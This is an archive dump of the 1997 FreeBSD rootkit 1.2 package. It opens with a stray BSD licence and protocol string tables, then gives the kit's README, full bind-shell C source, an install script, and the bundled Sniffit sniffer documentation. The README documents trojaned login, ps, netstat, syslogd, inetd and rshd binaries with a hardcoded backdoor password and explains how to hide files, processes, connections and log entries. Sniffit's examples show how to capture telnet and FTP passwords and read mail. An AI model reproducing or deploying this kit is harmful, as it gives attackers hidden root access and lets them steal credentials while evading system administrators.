* THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * @(#)tp_astring.c 8.1 (Berkeley) 6/10/93 * $Id: tp_astring.c,v 1.2 1994/08/02 07:50:51 davidg Exp $ */ char *tp_sstring[] = { "ST_ERROR(0x0)", "TP_CLOSED(0x1)", "TP_CRSENT(0x2)", "TP_AKWAIT(0x3)", "TP_OPEN(0x4)", "TP_CLOSING(0x5)", "TP_REFWAIT(0x6)", "TP_LISTENING(0x7)", "TP_CONFIRMING(0x8)", }; char *tp_estring[] = { "TM_inact(0x0)", "TM_retrans(0x1)", "TM_sendack(0x2)", "TM_notused(0x3)", "TM_reference(0x4)", "TM_data_retrans(0x5)", "ER_TPDU(0x6)", "CR_TPDU(0x7)", "DR_TPDU(0x8)", "DC_TPDU(0x9)", "CC_TPDU(0xa)", "AK_TPDU(0xb)", "DT_TPDU(0xc)", "XPD_TPDU(0xd)", "XAK_TPDU(0xe)", "T_CONN_req(0xf)", "T_DISC_req(0x10)", "T_LISTEN_req(0x11)", "T_DATA_req(0x12)", "T_XPD_req(0x13)", "T_USR_rcvd(0x14)", "T_USR_Xrcvd(0x15)", "T_DETACH(0x16)", "T_NETRESET(0x17)", "T_ACPT_req(0x18)", }; fbsdrootkit-1.2/README100600 764 764 14147 6273500240 12040 0ustar dfdfThe _____ ____ ____ ____ | ___| __ ___ ___| __ ) ___|| _ \ | |_ | '__/ _ \/ _ \ _ \___ \| | | | | _|| | | __/ __/ |_) |__) | |_| | |_| |_| \___|\___|____/____/|____/ rootkit 1.2 (1/27/97) by Method NOTE: This package was heavily influenced by the existing Linux rootkit, which in turn was adapted from the SunOS rootkit, etc., etc. UPDATES: 1.0.1 - Fixed some broken Makefile stuff. Made it so inetd does the right thing on a SIGHUP. Added some extra security to the shell trojans. 1.1 - Added tripwire trojan. Cleaned up some other stuff. 1.2 - Put a password on inetd (Thanks for the suggestion Whoot :) This package includes the following: chpass Trojaned! User->r00t inetd Trojaned! Remote access login Trojaned! Remote access ls Trojaned! Hide files du Trojaned! Hide files ifconfig Trojaned! Hide sniffing netstat Trojaned! Hide connections passwd Trojaned! User->r00t ps Trojaned! Hide processes rshd Trojaned! Remote access syslogd Trojaned! Hide logs sniffit A kewl sniffz0r! fix File fixer! addlen File length fixer(!) zapbsd2 An improved utmp/wtmp/lastlog type zapper bindshell port/shell type daemon! tripwire Trojaned! Hide changes INSTALLATION: To install this kit execute the command 'make all install' from the # prompt. All of the file/password configurations are in config.h so feel free to modify things to suit your particular fancy. Everything here has been tested on a FreeBSD-stable distribution. See the note at the end about what to do if the admin uses tripwire. Also make sure to read the Makefile and scripts so you know what's going on. USAGE: OK I will go through how to use each program one by one. NOTE when I say password I mean the rootkit password not your users password (d0h!). By default the rootkit password is "h0tb0x". chpass - Local user->root. Run ch{sh,fn,pass} then when it asks you for a new name enter your password. inetd - Binds a shell to a port for remote access. Adds a shell exec service on the ingreslock port, type in the rootkit password to start a shell. login - Allows login to any account with the rootkit password. If root login is refused on your terminal login as "r00t". History logging is disabled if you login using your password. ls - Trojaned to hide specified files and directories. The default data file is /dev/ptyr. All files can be listed with 'ls -/'. The format of /dev/ptyr is: ptyr fbsdrootkit-1.0 pr0n Use partial filenames. This would hide any files/directories with the names ptyr, fbsdrootkit-1.0 and pr0n. du - (see ls) ifconfig - Modified to remove PROMISC flag on the ethernet device. netstat - Modified to remove tcp/udp/sockets from or to specified addresses, paths and ports. default data file: /dev/ptyq command 1: hide local address command 2: hide remote address command 3: hide local port command 4: hide remote port command 5: hide UNIX socket path example: 1 128.31 <- Hides all local connections from 128.31.X.X 2 128.31.39.20 <- Hides all remote connections to 128.31.39.20 3 8000 <- Hides all local connections from port 8000 4 6667 <- Hides all remote connections to port 6667 5 .term/socket <- Hides all UNIX sockets including the path .term/socket passwd - Local user->root. Enter your rootkit password instead of your old password. ps - Modified to remove specified processes. Default data file is /dev/ptyp. An example data file is as follows: 0 0 Strips all processes running under root 1 p0 Strips tty p0 2 sniffer Strips all programs with the name sniffer Don't put in the comments, obviously. rshd - Execute remote commands as root. Usage: rsh -l rootkitpassword host command i.e. rsh -l h0tb0x 0wn3d.escape.com /bin/sh -i would start a root shell. syslogd - Modified to remove specified strings from logging. I thought of this one when I was on a system which logged every connection.. I kept getting pissed off with editing files every time I connected to remove my hostname. Then I thought 'Hey dude, why not trojan syslogd?!' and the rest is history. :) Default data file is /dev/ptys Example data file: evil.com 123.100.101.202 rshd This would remove all logs containing the strings evil.com, 123.100.101.202 and rshd. Smart! :)) sniffit - An advanced network sniffer. This is pretty kewl and has lots of filtering options and other stuff. Useful for targetting a single host or net. Sniffit uses ncurses. bindshell - This is pretty self-explanatory. Basically it binds a shell to a port, 31337 by default. Read the source on this one. fix - Replaces and fixes timestamp/checksum infomation on files. I modified this a bit for my own uses and to fix a nasty bug when replacing syslogd and inetd. The replacement file will be erased by fix (unlike other versions). addlen - This quickie modifies the length of files by adding harmless zeros to the end. Wonder why nobody ever thought of doing this before. Inspired by a stupid security tool which checks lengths of setuid files. zapbsd2 - This improved version of zapbsd writes over entries with ones instead of zeros. I added some capabilities and error checking so I raised the number. TRIPWIRE: I have done a major improvement of this part. Simply make tripwire and the script will ask you a few questions and take action depending on your responses. If both the database file and tripwire binary are read-only then there is nothing you can do. SOURCES: Some of these patches are derived from the original SunOS rootkit. ls, du, ps, netstat and chpass were done by yours truly. Anything else came from the Linux rootkit with a few modifications. The idea for tripwire was my own. OTHER: I welcome all comments and questions at method@yikes.com. All complaints and flames will be sent to /dev/null. Thanks to OGhost and Phelix for beta testing and advice. In closing, this kit can only take you so far. Although it covers almost everything, a competent sysadmin will eventually catch on. Remember, never let your guard down. -M fbsdrootkit-1.2/bindshell.c100600 764 764 2711 6266260424 13253 0ustar dfdf/* quick thingy... bind a shell to a socket... defaults to port 31337 */ /* code by pluvius@****** (address removed to protect the innocent :) */ /* don't forget.. when you connect to the port.. commands are like: */ /* "ls -l;" or "exit;" (don't forget the ';') */ /* cleaned up for the FreeBSD rootkit */ #include #include #include #include #include #include "rootkitutil.h" #define PORT 31337 main(int argc, char **argv) { int soc_des,soc_cli,soc_rc,soc_len,server_pid,cli_pid; struct sockaddr_in serv_addr,client_addr; BASENAME(argv[0]) if((soc_des=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP))<0) ERR("socket") memset(&serv_addr,0x00,sizeof(serv_addr)); serv_addr.sin_family=AF_INET; serv_addr.sin_addr.s_addr=htonl(INADDR_ANY); serv_addr.sin_port=htons(PORT); if((soc_rc=bind(soc_des,(struct sockaddr *)&serv_addr,sizeof(serv_addr)))<0) ERR("bind") if(fork()!=0) exit(0); setpgrp(); signal(SIGHUP, SIG_IGN); if(fork()!=0) exit(0); if((soc_rc=listen(soc_des, 5))!=0) ERR("listen") for(;;) { soc_len=sizeof(client_addr); if((soc_cli=accept(soc_des, (struct sockaddr *)&client_addr, &soc_len))<0) ERR("accept") cli_pid=getpid(); server_pid=fork(); if(server_pid!=0) { dup2(soc_cli,0); dup2(soc_cli,1); dup2(soc_cli,2); execl("/bin/sh","sh","-i",0); close(soc_cli); exit(0); } close(soc_cli); } } fbsdrootkit-1.2/install.sh100700 764 764 575 6265031277 13135 0ustar dfdf#!/bin/sh # Installation script for the FreeBSD rootkit. Make as many changes as you like. # Uncomment the below line if you want to backup the files. #BAKDIR=bak for BIN; do PROG=`basename $BIN` echo -n "Installing $PROG. . ." RKBIN=$PROG/$PROG if [ -x $BIN ]; then addlen $RKBIN $BIN fix $BIN $RKBIN $BAKDIR fi echo "done." done echo "The installation is complete." fbsdrootkit-1.2/sniffit.0.3.3/ 40700 764 764 0 6226213211 13131 5ustar dfdffbsdrootkit-1.2/sniffit.0.3.3/IMPORTANT100600 764 764 2403 6226213207 14534 0ustar dfdf#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*# * Sniffit V.0.3.3 * #*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*# Here are some remarks that could be important for some ppl. It gives extra info on various systems and fixes needed on some systems. The files referred to in here can be found in the 'Misc' directory. Most of those things are contributed by other ppl, so I don't take resposability for this. 1) configure: libpcap/configure script for bash/zsh type of shells. Contributed by Qing Long 2) ncurses: When having problems with ncurses during Sniffit compilation, please check the paths, and add some symbolic links. ncurses installations tend to differ. 3) FREEBSD: You should apply the FreeBSD_patch as follwing 'patch ../libpcap/pcap.c # unset bison unset ethers unset flex unset gcc unset gcc1 unset pcap unset ranlib unset brokenmake if [ -e /dev/bpf0 ] then pcap=bpf else if [ -f /usr/include/net/pfilt.h ] then pcap=pf else if [ -e /dev/enet ] then pcap=enet else if [ -e /dev/nit ] then pcap=snit else if [ -f /usr/include/sys/net/nit.h ] then pcap=nit else if [ -f /usr/include/net/raw.h ] then pcap=snoop # must test for snoop before dlpi due to IRIX else if [ -f /usr/include/sys/dlpi.h ] then pcap=dlpi else if [ -f /usr/include/linux/types.h ] then pcap=linux else echo "configure: cannot determine packet capture interface" exit 1 fi fi fi fi fi fi fi fi # echo "configure: using $pcap packet capture interface" # if [ -x /bin/uname \ -o -x /usr/bin/uname \ ] then name=$(uname -s | tr '[A-Z]' '[a-z]') vers=$(uname -r | sed -e 's/\..*//' -e 's/T1/v1/' | tr '[A-Z]' '[a-z]') if [ "$name$vers" = "sunos5" ] then PATH="$PATH:/usr/ccs/bin" fi else if [ -x /bin/arch ] then # sun3 only supported machine without uname if [ "$(/bin/arch)" = "sun3" ] then name=sunos vers=3 fi fi fi # if [ "$name" = "bsd/386" \ -o "$name" = "bsd/os" \ ] then os=bsd else os="$name$vers" fi # if [ -x /usr/local/bin/flex \ -o -x /usr/local/flex \ -o -x /usr/bin/flex \ -o -x /bin/flex \ ] then # The -V flag was added in 2.4 if flex -V &> /dev/null then flex='-e s/^#have-flex#//' echo "configure: found flex executable" else s="version 2.4 or higher required" echo "configure: ignoring obsolete flex executable ($s)" fi else echo "configure: couldn't find flex executable; using lex" fi # if [ -x /usr/local/bin/bison \ -o -x /usr/local/bison \ -o -x /usr/bin/bison \ -o -x /bin/bison \ ] then bison='-e s/^#have-bison#//' echo "configure: found bison executable" else echo "configure: couldn't find bison executable; using yacc" fi # if [ -z "$flex" -a -n "$bison" ] || [ -n "$flex" -a -z "$bison" ] then s="reverting to lex/yacc" echo "configure: don't have both flex and bison; $s" unset flex unset bison fi # unset libc # for f in /usr/lib/libc.a /lib/libc.a /usr/lib/libc_s.a ; do if [ -f $f ] then libc=$f break fi done # if [ "$f" = "" ] then echo "configure: couldn't find libc" else if $libc 2>&1 | grep ether_ntoa > /dev/null then ethers='-e s/^#have-ethers#//' echo "configure: found support for /etc/ethers" fi fi # if [ -x /usr/local/bin/gcc \ -o -x /usr/local/gcc \ -o -x /usr/bin/gcc \ -o -x /bin/gcc \ ] then gcc='-e s/^#have-gcc#//' ver=$(gcc -v 2>&1 | sed -n -e '$s/.* //' -e '$s/\..*//p') if [ "$ver" = 1 ] then gcc1='-e s/^#have-gcc1#//' fi fi # if [ -x /usr/bin/ranlib ] then ranlib='-e s/^#have-ranlib#//' fi # if [ "$os" = "ultrix4" \ -o "$os" = "sunos3" \ ] then brokenmake='-e s/^#have-broken-make#//' fi # rm -f stdlib.h Makefile # if ! [ -f /usr/include/stdlib.h ] then ln -s /dev/null stdlib.h fi # sed -e "s/^#have-$pcap#//" \ -e "s/^#have-$os#//" \ $flex \ $bison \ $gcc \ $gcc1 \ $ranlib \ $ethers \ $brokenmake \ Makefile.in > Makefile # mflags="" # if [ "$gcc" != "" ] then mflags="CC=gcc" rm -f checkioctl make checkioctl ./checkioctl if ! ./checkioctl then rm checkioctl echo "configure: bailing..." rm Makefile exit 1 else rm checkioctl fi fi # chmod ug+w Makefile make depend $mflags exit 0 # fbsdrootkit-1.2/sniffit.0.3.3/Misc/FreeBSD_patch100600 764 764 1212 6226213207 16440 0ustar dfdf*** libpcap/pcap.c Fri Feb 16 04:09:21 1996 *************** *** 156,167 **** char * pcap_strerror(int errnum) { ! extern int sys_nerr; ! extern char *sys_errlist[]; static char ebuf[20]; ! if ((unsigned int)errnum < sys_nerr) ! return (sys_errlist[errnum]); (void)sprintf(ebuf, "Unknown error: %d", errnum); return(ebuf); } --- 156,167 ---- char * pcap_strerror(int errnum) { ! /* extern int sys_nerr; ! extern char *sys_errlist[]; */ static char ebuf[20]; ! /* if ((unsigned int)errnum < sys_nerr) ! return (sys_errlist[errnum]); */ (void)sprintf(ebuf, "Unknown error: %d", errnum); return(ebuf); } fbsdrootkit-1.2/sniffit.0.3.3/README.FIRST100600 764 764 62402 6226213207 15027 0ustar dfdf#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*# * Sniffit V.0.3.3 * * By Brecht Claerhout * # This program is intended to demonstrate the unsafeness of TCP (currently) # * No illegal activities are encouraged! * # Anyway, I'm not responsible for anything you do with it. # * * # Sniffit grew a little upon it's original intentions and is now # * extended for network debugging (UDP, ICMP, netload, etc.) * #*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*# * Libpcap library * # This product includes software developed by the Computer Systems # * Engineering Group at Lawrence Berkeley Laboratory. * #*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*# 0. Introduction, and some stuff you should know. crap, credits and compilation notes 1. Programmers notes excuses for my incompetence 2. Use of the program flags and examples 3. Extra info on use 3.1 Running interactive mode 3.2 Forcing network devices (*READ*) 3.3 Format of the config file 3.4 Loglevels 4. The output 4.1 Normal 4.2 Logfile 5. IMPORTANT NOTES, READ! this also! 6. BUGFIXES 7. NEW STUFF to keep track of what's in it ------------------------------------------------------------------------------ 0. Introduction, and some stuff you should know. ------------------------------------------------ 0.3.3... A full package, no patch. Because 0.3.2 was kind of getting a mess (you know a bug in one of the functions). I cleaned it out, and saw that the patch was huge, so I could beter restart. (I've reformatted, rewritten and cleaned out some parts). What did I do? Besides cleaning up, I worked in the interactive part. I've been neglecting it lately... and it's one of the parts people like my program for, and to be honest I re-discovered it when in need of a interactive sniffer. No more lockups, no more weird behaviour... I recoded some parts, tested it thoroughly. The interface adjusts to your screensize, what makes it very usefull when working on an 21" X-term (minimum dimensions of a window should be 80x18 chars). I also added a nice feature for adding programs to the sniffit package (see discussion of interactive part below) I use the libpcap library developped at Berkeley Laboratory, for easy porting (Read the licence). Credits go to: Wim Vandeputte, best friend and UNIX guru, for support, testing and providing me with a WWW site. Godmar Back, for fixing that kernel 1.2.X bug (Sniffit 0.1.X). Peter Kooiman, of Paradigm Systems Technology for providing the facilities to port Sniffit, and for the endless testing (although he laughs this away with "no big deal, I don't need no credits"). Without him, there would have been no ports at all. Brooke Paul, for providing me with an SGI account. Qing Long, for the bash/zsh libpcap/configure script. Guy Gustavson, for giving me a FreeBSD account. Woju (woju@freebsd.ee.ntu.edu.tw), for the ncurses SunOS/FreeBSD fixing, and for his other effords. Brian Beaulieu, for making a U.S. mirror site available! (see below for URL) everybody, who ever mailed me with sugestions help, etc... This is free software, spread it if you want, but keep the package complete and unmodified. Do not use any code from this package without mentioning the source in your docs and advertisement. Do not use any of this code in Commercial Software/Commercial Packages. Sugestions and comments can be sent to: coder@reptile.rug.ac.be Brecht Claerhout Meulebeeksestw. 51 8700 Tielt Belgium The original distribution program can be optained from (my site): http://reptile.rug.ac.be/~coder/sniffit/sniffit.html U.S. mirror site (thank you Brian!): http://despair.capecod.net/sniffit/sniffit.html MIND YOU: this program is ran as root, and thus could easily contain dangerous trojans. If you get it from the above site you can safely compile and use it. (no trojan versions are discovered yet.. it's just a warning) Compiling: Look at the "config.h" file for options. PLEASE CHECK THAT CONFIG FILE!!! Type "make " to compile. Where is one of: linux sunos irix freebsd (sunos: SunOS/Solaris) (freebsd: PLEASE APPLY THE PATCH FIRST, READ IMPORTANT!!!) Other stuff.... make clean : cleans all directories for a compiling from scratch make sniffit_manual: look at the end of the makefile, this part is easily modified manually. If the program doesn't compile and you want to add some comliling options 1. Programmers notes -------------------- No more excuses ..... I think I used the easiest solution, probably somewhere some guru is now laughing with my lack of programming skill, but the hell with it, it works (most of the time, here.... ;) Still I note the use of shared memory, with Linux you should take extra care when recompiling your kernel! Answer YES to 'System V IPC (CONFIG_SYSVIPC) [y]'. 2. Use of the program --------------------- (The man pages have detailed info on what parameters you can mix) Options: ONE of these is required! -v Show version and exit (just added because it's such a wide spread option) -t tells the sniffer to check out packets GOING TO -s tells the sniffer to check out packets COMMING FROM You can now use the 'x' wildcard (only IP NUMBERS of course). e.g. -t 199.145.x -t 199.14x mind you -t x is not a valid option. -i Interactive mode, overrides all other options -c Use as a config file for Sniffit See 3.3 for format of the config file. NOTE: -t or -s only apply to TCP packages, ICMP, IP, UDP packages are ALL interpreted. Also, any selection on ports, -p only applies to TCP packages. Parameters for all modes: -F force sniffit to use a network device (READ 3.2 ON THIS SUBJECT, IMPORTANT) -n Turn of IP checksum checking. This can show you bogus packets. (mind you ARP, RARP, other non-IP packets will show up bogus too) (compatible with ALL options) Parameters for not running in -i: -b does both -t and -s, doesn't mather what function you used (-t or -s) -d Dump mode, shows the packets on the screen in bytes (not like tcpdump). For test purposes. (numbers are hex) -a same of '-d' but outputs ASCII. -x Prints extended info on TCP packets (SEQ numbers, ACK, Flags) Like SEQ, ACK, the flags, etc... (works wit '-a', '-d', '-s', '-t', '-b' or on its own.) (Mind you it is always shown on stdout, so not logged when using '-t', '-s', '-b' without another parameter) -A When in logging mode, all non-printable chars will be replaced by . (see note below 4.The output) -P protocol specify the protocols examined (default TCP) possible options currently are: IP, TCP, ICMP, UDP They can be combined. -p Logs connections on port , 0 means all ports, default is 0 (all), look out with that on loaded nets! -l Ammount of information to log (default 300 bytes). Length 0 logs everything. (look out with diskspace when logging everything!) Parameters with -i: -D All logging output will be send to that device. It's cool to get the same IRC screen as the guy y'r sniffing upon ;-) Parameters with -c: -L enable logging with as loglevel currenly the following loglevels are supported: 1 : Raw level 10,12 : Normal level (see '2. The Output' for more info) Some examples: Imagine the following setup: 2 hosts on a subnet, one is running the sniffer (sniffit.com), the otherone is 666.666.666.7 (target.com). 1. You want to test if the sniffer is working: sniffit:~/# sniffit -d -p 7 -t 666.666.666.7 and in another window: sniffit:~/$ telnet target.com 7 you should see the sniffer giving you packets as you telnet to the 'echo' service. 2. I want to log some passwords from people on 666.666.666.7: sniffit:~/# sniffit -p 23 -t 666.666.666.7 3. Root of target.com tells me he gets strange ftp connections and wants to find out the commands typed: sniffit:~/# sniffit -p 21 -l 0 -t 666.666.666.7 4. You want to read all incomming and outgoing mail on target.com: sniffit:~/# sniffit -p 25 -l 0 -b -t 666.666.666.7 & or sniffit:~/# sniffit -p 25 -l 0 -b -s 666.666.666.7 & 5. You want to use the menu based interface. sniffit:~/# sniffit -i 6. Something is really wrong and you want to see the Control Messages with error codes. sniffit:~/# sniffit -P icmp -b -s 666.666.666.7 7. Go wild on scrolling the screen. sniffit:~/# sniffit -P ip -P icmp -P tcp -p 0 -b -a -d -x -s 666.666.666.7 witch is the same as sniffit:~/# sniffit -P ipicmptcp -p 0 -b -a -d -x -s 666.666.666.7 8. Log passwords in that way you can read them with 'more 666*' sniffit:~/# sniffit -p 23 -A . -t 666.666.666.7 or sniffit:~/# sniffit -p 23 -A ^ -t dummy.net 9. This could go on for ever.............. 3. Extra info on use -------------------- 3.1 Running interactive mode ---------------------------- When running in interactive mode: UP or 'k' : self explanatory DOWN or j': self explanatory F1 or '1' : Enter a host (enter 'all' for no mask) for packet filtering (host that sends the packets) F2 or '2' : Enter a host (enter 'all' for no mask) for packet filtering. (host that receives the packets) F3 or '3' : Enter a port (enter '0' for no mask) for packet filtering. (host that sends the packets) F4 or '4' : Enter a port (enter '0' for no mask) for packet filtering. (host that receives the packets) F5 or '5' : Start a program 'sniffit_key5' with arguments If the program doesn't exist, nothing is done. Sniffit should be in the same path as sniffit was STARTED FROM (not necessarely the path sniffit is stored in) This is usefull for interactive connection killing or extra monitoring. A little shell script can always transform the arguments given and pass them on to other programs. F6 or '6' : Same as F5 or '5', but with program 'sniffit_key6' F7 or '7' : Same as F5 or '5', but with program 'sniffit_key7' F8 or '8' : Same as F5 or '5', but with program 'sniffit_key8' ENTER : a window will pop up and log the connection, or the connection output will be send at a chosen device if you used the '-D' option. 'q' : When in logging mode, stop logging. Otherwise, quit. 'n' : Toggle netstatistics. These are sampled at 3 secs, look in the config.h file to change this (could be needed if y'r computer is slow). 'r' : Reset.. clears all current connections from memory and restarts. 3.2 Forcing network devices (*READ*) -------------------------------------- NOTE: the correct name (for sniffit) of a device can be found by running 'ifconfig' When forcing network devices, sniffit tries to find out what device it is. If sniffit recognises the name, everything is okay. If it does not recognise the name it will set the variable FORCED_HEAD_LENGHTH to the ethernet headlength. The ethernet headlength is the length in bytes of an ethernet packet hearder. So if you have to force a non-ethernet device, that is not recognised by sniffit, make sure you change that headlength correctly in the 'config.h' file. The -F option was added, because I noticed devicenames can differ from system to system, and because some ppl have multiple devices present. When having problems with this option, please think twice before you mail me. 3.3 Format of the config file ----------------------------- The configfile should have lines with the following format: [] (seperators are spaces (any number of), NO TABS!!!) Lines that don't match this pattern are discarded, so standard unix comments '#' can be used in this file... (this also means that if you have a typo there, Sniffit won't report it but just discard the line) (read this list, even if you don't get it at first, it will become clear in the examples) can be: select : Sniffit will look for packets that match the following description (other fields) deselect : Sniffit will ignore packets that match the description logfile : change the logfile name to instead of the default 'sniffit.log' can be: from : Packets FROM the host matching the following desc. are considered to : similar, Packets TO the.... both : similar, Packets FROM or TO the.... a filename : as an argument of 'logfile' in can be: host : The (de)selection criteria involves a hostname. port : similar, ... a portnumber mhosts : The (de)selection criteria involves multiple-hosts, like with the wildcars in 0.3.0, but without the 'x' can be: either a hostname, a portnumber or a numbet-dot partial notatiion indicating multiple hosts depending on can be: a portnumber, if was 'host' or 'mhosts' Maybe it would have been wise to mention explicitely, that the config-file currently only works with TCP packets. examples: 1. Look at this configuration file: select from host 100.100.12.2 select from host 100.100.12.3 1400 select to host coder.sniffit.com select both port 23 This file would cause Sniffit to give you the packets: a) Send by host 100.100.12.2 b) Send by host 100.100.12.3 from port 1400 c) Send to coder.sniffit.com d) All packets on our subnet going to or comming from a telnet port. 2. another example: select both mhosts 100.100.12. deselect both port 80 select both host enemy.sniffit.com This file would cause Sniffit to give you the packets: a) Send by hosts '100.100.12.*' b) EXCEPT the WWW packets c) BUT showing the WWW packets concerning enemy.sniffit.com The config file in interpreted SEQUENTIAL, so mixing up those lines could have unwanted results e.g.: select both mhosts 100.100.12. select both host enemy.sniffit.org deselect both port 80 This will give you the packets: a) Send by hosts '100.100.12.*' b) Send from/to enemy.sniffit.org c) deselecting all WWW packets on the subnet So if someone on enemy.sniffit.org is netscaping (assuming his 'target' has his httpd installed on port 80), you would see the packets with the first config file, BUT NOT with the second file, and that could spoil y'r fun when he's surfing to some kinky page. 3. Last usefull example: select both mhosts 1 select both mhosts 2 deselect both mhosts 1 80 deselect both mhosts 2 80 This would show you all subnet trafic excluding WWW trafic (concerning port 80.) NOTE: Everything is DESELECTED by default, so an empty config file will get you nothing. 3.4 Loglevels ------------- Levels are divided into groups (1-9, 10-29, ..??) and within each group, they 'add' features to the logging mode. e.g. loglevel 13, will do everything loglevel 12 does, and some additional stuff... (this for future development) Raw (levels 1-9) 1 : Log all SYN, FIN, RST packets. This will give you an overview of all network (TCP) trafic in a 'RAW' way (a connection starting could gives you at least 2 SYN packets, etc...). Messages are: Connection initiated. (SYN) Connection ending. (FIN) Connection reset. (RST) Normal (levels 10-29) 10: Same as Raw level 1, but a bit more intelligent. Unless packets are transmitted multiple times because of packet loss, you will only get 1 notice of a connection starting or ending. (the packet id will state the host that initiated the connection first) Messages are: Connection initiated. Connection closed. 12: This option will spy on trafic concerning ports 21 and 23 on the subnet. Yes indeed, FTP and TELNET. Sniffit will try to catch login and passwords for these applications. FTP Easy catching. Even multiple tries are registered. TELNET A bit harder. We only try to catch the first attempt, so if someone fails the first login, you will miss his password. A '~' in the login and passwords fields can be a nonprintable character (if in the beginning of a field, probably due to an early start of registration) or a '~'. This all makes it sound a little messy, but I 'testdrived' a lot and was pleased with the results after adding some funky shit (if y'r interested have a look at in function 'packethandler' in sniffit.0.3.2.c) 4. The output ------------- 4.1 Normal ---------- - IP header info (not logged, displayed): Examples: from 100.100.60.80 to 100.100.69.63 IP Packet precedence: Routine (-T-) FLAGS: -- -- Time to live (secs): 59 Protocol (6): TCP from 100.100.69.31 to 100.100.69.63 IP Packet precedence: Routine (---) FLAGS: -- -- Time to live (secs): 60 Protocol (17): UDP from 100.100.69.51 to 100.100.69.63 IP Packet precedence: Routine (---) FLAGS: -- -- Time to live (secs): 255 Protocol (1): ICMP explanation: Precedence can be: Routine, Priority, Immediate, Flash, Flash override, Critical, Internetwork Control, Network control The Flags between brackets: (DTR) Delay-Throughput-reliability FLAGS: DF MF DF=Don't Fragment MF=More Fragments - TCP Packets (logged or displayed): The sniffer logs the data in ascii format. So when logging telnet connections, you will need to use 'joe' or something else that can support control chars (look for '-A ' below). Telnet 'negotiates' (binary) in the beginning of every connection, and 'catting' a output file, will most of the time show nothing (due to control chars). Of course when logging mail, there are no problems. The new '-A ' takes care of the control characters, that way you will be able to read the logfiles with 'more', 'vi', etc... -a and -d give you raw packets i.e. not unwrapped, on the screen (nothing is logged), -x gives you more info on the TCP package (everything is still logged unless using -a or -d mode), The flags are: U: Urgent pointer significant A: Acknowledgement is signif (will be shown) P: Push function R: Reset the connection S: Synchronizes sequence numbers F: No more data from sender (end connection) Filenames Created: Imagine a subnet with the hosts 666.666.666.666 and 666.666.666.7, and we run a sniffer on the first. The sniffer creates the following files: When logging packets TO host 666.666.666.7 (-t 666.666.666.7) files like 777.777.7.7.15000-666.666.666.7.23 are created, when the data CAME FROM host 777.777.7.7-15000 (with 15000 port used on 777.777.7.7 for that connection, and received on port 23 of 666.666.666.7) When logging packets FROM host 666.666.666.7 (-s 666.666.666.7) files like 666.666.666.7.15000-777.777.7.7-23 are created, when the data GOES TO host 777.777.7.7 (with 15000 port used on 666.666.666.7 for that connection) - ICMP Packets (not logged, displayed): On host 100.100.69.63 someone tried 'telnet 100.100.23.23' Suppose this host is unreachable, this could be a possible output: ICMP message id: 100.100.69.254 > 100.100.69.63 ICMP type: Destination unreachable Error: Host unreachable ICMP message concerned following IP packet: from 100.100.69.63 to 100.100.23.23 IP Packet precedence: Routine (---) FLAGS: -- -- Time to live (secs): 63 Protocol (6): TCP - UDP Packets (not logged, displayed) You get the package id. When using -d, -a you get the contence of the package. (pretty basic) 4.2 Logfile ----------- If you use a configfile (-c) and enable the Logging option a logfile is created. Unless you set 'logfile' in the config file, that file will be named 'sniffit.log'. It will contain lines with the following FIXED format: 1) Date - Connection id.: message e.g. [Mon Aug 19 22:38:56 1996] - 100.100.10.10.1046-110.110.11.11.23: Connection initiated. (conn. init. on the same line as the rest) 2) Except the starting line and the ending line of each session, they are: [Mon Aug 19 22:38:51 1996] - Sniffit session started. [Mon Aug 19 22:39:44 1996] - Sniffit session ended. 3) Lines containing other data (future versions), will NOT begin with '[' and will have also easily interpretable formats. Other data is e.g. packet contence I do this because I can imagine (when this is more expanded) that people will use their own parsers for these logfiles. Well, if you respect those 3 rules, your parser will work on all future versions of Sniffit. 5. IMPORTANT NOTES, READ! ------------------------- First of all, some stuff people who use this program should already know, if you don't, well here ya got it: Some other notes: - Sniffers can only be run by ROOT - Sniffers can only log packets that 'travel' on THEIR ethernetcable. So there has to be some host on your subnet involved (either as sender or receiver). - Working with '-d' or '-a' give you raw packets, they are still packed in IP, when logging to files, only send data is logged, the packets are 'unwrapped'. - Sniffers can not be detected from the outside (look below for note on harddisk). Some people pretend that tcp wrappers and stuff can detect sniffers, well that's bullshit. Sniffers are just 'sitting' on the line and reading what is passing anyway, they don't DO anything, they just watch. They can be detected: - In the processlist (ps -augwx) - When the harddisklight flashes a lot, people can suspect something Also harddisks can make a lot of noice, but these sympthomes are only payed attention to in hostile environments. - (LINUX) Your KERNEL should support System V IPC. If you will use '-i' 6. BUGFIXES ----------- (PRIOR TO 0.2.0 - some are LINUX only) - Kernel 1.2.(some) incompatibility should be fixed. (like 1.2.5) (all credit for that to Godmar Back) - logging connections with lots of data is okay too now. 'the integer that needed to be a long'-bug. It was an overflow prob. - off course there are always minor ameliorations not worth mentioning (SINCE 0.2.0) - MAXCOUNT bug - interactive part lock-up bugs - 